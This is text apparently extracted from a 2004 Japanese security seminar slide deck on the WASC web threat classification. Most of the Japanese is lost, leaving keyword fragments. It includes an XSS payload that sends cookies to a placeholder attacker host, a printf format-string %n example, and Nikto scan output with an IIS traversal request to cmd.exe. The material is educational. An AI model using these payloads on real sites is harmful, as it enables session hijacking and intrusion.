shio_20041004.PDF

JPNIC JPCERT/CC 2004 Web 2004 10 4 <shio@st.rim.or.jp>

Web Web Web WASC Web Application Security Consortium 7 Web Security Threat Classification Web URL 2

...?? It depends!? It depends!??? 3

? It depends!... 4

Web Web Web... Crosssite Scripting SQL... OS SYN Flood IP ARP TCP Reset......... 5

Web ID HTTP LDAP Web OS SQL SSI XPath WASC Web Security Threat Classification 6

Authentication...... Brute Force Insufficient Authentication Weak Password Recovery Validation 7

Authentication ID Web ID ID 8

Authentication URL URL URL... Web /admin/ Security Through Obscurity... 9

Authentication Web Web...... Web 10

Authorization...... ID Credential/Session Prediction Insufficient Authorization Insufficient Session Expiration Session Fixation 11

Web HTTP TCP ID ID ID ID 12

Authorization ID ID ID ID ID ID ID ID ID ID 13

ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:1235 14

Authorization URL URL URL... Security Through Obscurity... 15

Authorization ID Web ID... XSS back SSL 16

Authorization ID fix Web ID ID ID HTML URL XSS Cross-site Scripting Cookie Web ID ID Web Web ID ID ID IP 17

SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID 1234 18

Client-side Attacks Web Web Content Spoofing Cross-site Scripting 19

Client-side Attacks Web URL URL URL Web... URL URL 20

Client-side Attacks XSS Web JavaScript/VBscript Web Web IE Web Cookie ID Web 21

http://server/cgi?name=joe Cookie Hello Joe! Cookie... http://server/cgi?name =<script>document.lo cation='http://attacker /getcookie?'+document.cookie</script> Cookie... Cookie <script>document. location='http://att acker/getcookie?'+ document.cookie</ script> 22

Command Execution Web...... Buffer Overflow Format String Attack LDAP Injection OS Commanding SQL Injection SSI Injection XPath Injection 23

Command Execution C/C++ CGI C Web 24

25 BOF

Command Execution... printf() %s, %d, %x,... printf(buf); buf C/C++ CGI C %x %n 4 Web 26

printf("%x", 1); 1 16 printf(buf); buf "%x" 16 27

int i; printf("abcd%n", &i); i 4 printf(buf); buf "0xbffff658%x%x%x%x...%n" 0xbffff658 N 28

Command Execution LDAP LDAP LDAP Web LDAP 29

Command Execution OS OS Web Perl C PHP... 30

Command Execution SQL SQL Web Union... 31

Command Execution SSI SSI HTML Web HTML Web... SSI OS SSI 32

Command Execution XPath XPath... XML XPath XML Web 33

Information Disclosure Web... Directory Indexing Information Leakage Path Traversal Predictable Resource Location 34

Information Disclosure URL Web Apache 1.3; GET //////////... HTTP/1.0 Google Web 35

Information Disclosure Web HTML?... Web IP Web 36

Information Disclosure Traversal... Unicode UTF-8 NULL %00 OS Web 37

Information Disclosure....bak.old.org.orig....conf.cfg.config....dat.data... /admin/ /backup/ /logs/... 38

Nikto Web Nikto http://www.cirt.net/code/nikto.shtml $ perl nikto.pl -nolookup -host 192.168.183.12 --------------------------------------------------------------------------- - Nikto 1.34/1.29 - www.cirt.net + Target IP: 192.168.183.12 + Target Hostname: 192.168.183.12 + Target Port: 80 + Start Time: Thu Sep 30 07:27:42 2004 ---------------------------------------------------------------------------... + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK,UNLOCK + /<script>alert('vulnerable')</script>.shtml - Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)... + /blahb.ida - Reveals physical path....... + /xxxxx.htw - Server may be vulnerable to a Webhits.dll arbitrary file retrieval.... + /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir - IIS is vulnerable to a double-decode bug, which allows...... + /_vti_bin/fpcount.exe - Frontpage counter CGI has been found.......... + 2648 items checked - 20 item(s) found on remote host(s) + End Time: Thu Sep 30 07:28:28 2004 (46 seconds) --------------------------------------------------------------------------- + 1 host(s) tested 39

Logical Attacks Web... Web Abuse of Functionality Denial of Service Insufficient Anti-automation Insufficient Process Validation 40

Logical Attacks Web Web Web Web hidden Web Frontpage Server Extensions IIS WebDAV IIS hidden 41

Logical Attacks Web...... SQL Web Web 42

Logical Attacks Web 43

Logical Attacks hidden Cookie... 44

HTTP Response Splitting Location Web Web Server/Application Fingerprinting Cookie Web Web 45

...??? ID??? SQL?... Web Web 46

Web...!! 47

WASC Web Security Threat Classification http://www.webappsec.org/threat.html OWASP Top Ten http://www.owasp.org/documentation/topten.html OWASP A Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html @IT Web http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.htm @IT http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html HTTP Response Splitting http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf The Google Hackers Guide http://johnny.ihackstuff.com/security/premium/the_google_hackers_guide_ v1.0.pdf 48